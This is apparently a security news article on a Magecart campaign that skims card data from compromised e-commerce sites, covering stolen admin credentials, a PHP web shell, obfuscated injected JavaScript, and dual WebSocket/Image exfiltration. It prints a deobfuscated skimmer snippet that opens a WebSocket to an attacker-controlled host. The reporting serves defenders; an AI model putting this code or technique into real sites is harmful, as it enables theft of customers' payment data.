![[The AI Show Episode 144]: ChatGPT’s New Memory, Shopify CEO’s Leaked “AI First” Memo, Google Cloud Next Releases, o3 and o4-mini Coming Soon & Llama 4’s Rocky Launch](https://www.marketingaiinstitute.com/hubfs/ep%20144%20cover.png)
![BPMN-procesmodellering [closed]](https://i.sstatic.net/l7l8q49F.png)
-All-will-be-revealed-00-35-05.png?width=1920&height=1920&fit=bounds&quality=70&format=jpg&auto=webp#)
-All-will-be-revealed-00-17-36.png?width=1920&height=1920&fit=bounds&quality=70&format=jpg&auto=webp#)
-Jack-Black---Steve's-Lava-Chicken-(Official-Music-Video)-A-Minecraft-Movie-Soundtrack-WaterTower-00-00-32_lMoQ1fI.png?width=1920&height=1920&fit=bounds&quality=70&format=jpg&auto=webp#)
![What iPhone 17 model are you most excited to see? [Poll]](https://9to5mac.com/wp-content/uploads/sites/6/2025/04/iphone-17-pro-sky-blue.jpg?quality=82&strip=all&w=290&h=145&crop=1)
![Pixel Weather widgets & At a Glance now open correct location [U]](https://i0.wp.com/9to5google.com/wp-content/uploads/sites/4/2024/12/Pixel-9-Pro-Weather-UI-1.jpg?resize=1200%2C628&quality=82&strip=all&ssl=1){kind=tracking}
![Hands-On With 'iPhone 17 Air' Dummy Reveals 'Scary Thin' Design [Video]](https://www.iclarified.com/images/news/97100/97100/97100-640.jpg)
![Mike Rockwell is Overhauling Siri's Leadership Team [Report]](https://www.iclarified.com/images/news/97096/97096/97096-640.jpg)
![Instagram Releases 'Edits' Video Creation App [Download]](https://www.iclarified.com/images/news/97097/97097/97097-640.jpg)
![Inside Netflix's Rebuild of the Amsterdam Apple Store for 'iHostage' [Video]](https://www.iclarified.com/images/news/97095/97095/97095-640.jpg)
New Magecart Attack With Malicious JavaScript Steals Credit Card Data
A sophisticated Magecart attack campaign has been discovered targeting e-commerce platforms, employing heavily obfuscated JavaScript code to harvest sensitive payment information. This latest variant of Magecart skimming attacks exhibits advanced techniques for evading detection while seamlessly capturing credit card details during the checkout process. The malicious code, injected into compromised e-commerce sites, operates silently in […] The post New Magecart Attack With Malicious JavaScript Steals Credit Card Data appeared first on Cyber Security News.
A sophisticated Magecart attack campaign has been discovered targeting e-commerce platforms, employing heavily obfuscated JavaScript code to harvest sensitive payment information.
This latest variant of Magecart skimming attacks exhibits advanced techniques for evading detection while seamlessly capturing credit card details during the checkout process.
The malicious code, injected into compromised e-commerce sites, operates silently in the background, creating an invisible bridge between unsuspecting customers and attackers’ command-and-control servers.
The attack follows a multi-stage intrusion pattern that begins with unauthorized access to the website’s back-end systems.
.webp)
Attack steps (Source – Yarix)
According to the findings, attackers initially compromise administrator credentials, often using information stolen through infostealer malware deployed on victims’ systems.
These credentials provide the attackers with the privileged access needed to initiate their attack sequence, allowing them to bypass standard security measures and establish a foothold within the target infrastructure.
.webp)
Yarix researchers identified this particular strain of Magecart during a forensic investigation of compromised e-commerce platforms.
Their analysis revealed that once attackers gain administrative access, they swiftly upload a customized PHP web shell to maintain persistent access, enabling continued control over the server even if the initial breach is discovered.
The web shell identified bears structural similarities to the open-source P.A.S. Fork v. 1.4 tool but contains custom modifications specific to this attack campaign.
The impact of these attacks extends beyond financial losses, creating significant reputational damage for affected merchants and eroding consumer trust.
The stolen data typically includes complete card details (number, expiration date, CVV), personal information (name, address, email), and often shipping details – essentially providing attackers with everything needed to conduct fraudulent transactions or engage in identity theft.
.webp)
The attack progression follows four distinct phases: initial back-end access using stolen credentials, web shell installation for persistent control, database poisoning through injection of obfuscated code, and finally, the credit card theft phase where customer payment information is captured and exfiltrated.
This methodical approach demonstrates the sophisticated tactics employed by these threat actors.
JavaScript Obfuscation and Data Exfiltration Techniques
The malicious JavaScript employs sophisticated obfuscation techniques to evade detection. The original code appears as an unreadable jumble of hexadecimal values, variable assignments, and function calls without indentation.
A key function named “chameleon” serves as a cornerstone of the obfuscation strategy, dynamically redefining itself during execution and working in conjunction with immediately invoked function expressions (IIFE) to further complicate analysis.
createWebSocket=(randomString=genRandomString())=>{
if(Mp2mK1sl_Socket!==![] || localStorage['getItem']
('XsuHCYmfbgVSRFVx7SHRnU7DfapjFpaf')===null)
return![];
Mp2mK1sl_Socket=new WebSocket('wss://'+JSON['parse'](localStorage['getItem']
('XsuHCYmfbgVSRFVx7SHRnU7DfapjFpaf'))['map']
(function(_Oxe38f46) {
return String['fromCharCode'](_Oxe38f46);
})['join']('')+'?token='+randomString)
}The data exfiltration mechanism employs two distinct channels to ensure successful theft.
The primary method utilizes WebSockets for real-time communication with attacker-controlled servers, while a secondary technique leverages the Image object to create invisible requests containing encoded credit card data.
This innovative dual-channel approach increases the attackers’ chances of successfully extracting data even when network monitoring systems might detect and block one exfiltration method.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy
The post New Magecart Attack With Malicious JavaScript Steals Credit Card Data appeared first on Cyber Security News.
